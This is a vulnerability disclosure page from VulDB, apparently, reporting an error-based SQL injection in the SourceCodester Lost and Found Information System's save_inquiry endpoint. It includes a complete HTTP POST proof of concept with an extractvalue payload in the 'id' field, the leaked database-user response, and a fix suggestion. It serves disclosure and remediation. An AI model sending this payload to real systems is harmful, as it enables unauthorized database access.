Gửi #182669: SourceCodester Lost and Found Information System sql injectionthông tin

tiêu đềSourceCodester Lost and Found Information System sql injection
Mô tảI find a SQL injection vulnerability in the SourceCodester Lost and Found Information System(https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html) This affect the file /classes/Master.php?f=save_inquiry: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------291530209222137902962820473916 Content-Length: 1093 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/admin/?page=items/manage_item Cookie: PHPSESSID=0mct2fkncfd5or5crbqj5o62he Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="category_id" 2 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="fullname" 1111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="title" 111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="contact" 111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="description" 1111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="status" 0 -----------------------------291530209222137902962820473916-- And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `category_id`='2' , `fullname`='1111' , `title`='111' , `contact`='111' , `description`='1111' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}". The appearance of '~ admin@localhost ~' proves that our code select user() was successfully executed, and there is an SQL error injection vulnerability here The vulnerability arises from the usage of the code "UPDATE `inquiry_list` set {data} where id = '{id}' ;" without implementing sufficient filtering on the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
Nguồn⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Người dùng
 Tritium (UID 50779)
Đệ trình14/07/2023 12:39 (cách đây 3 những năm)
Kiểm duyệt15/07/2023 09:33 (21 hours later)
Trạng tháiđược chấp nhận
Mục VulDB234224 [SourceCodester Lost and Found Information System 1.0 HTTP POST Request Master.php?f=save_inquiry ID Tiêm SQL]
điểm20

TrướcTổng QuanTiếp theo

Do you want to use VulDB in your project?

Use the official API to access entries easily!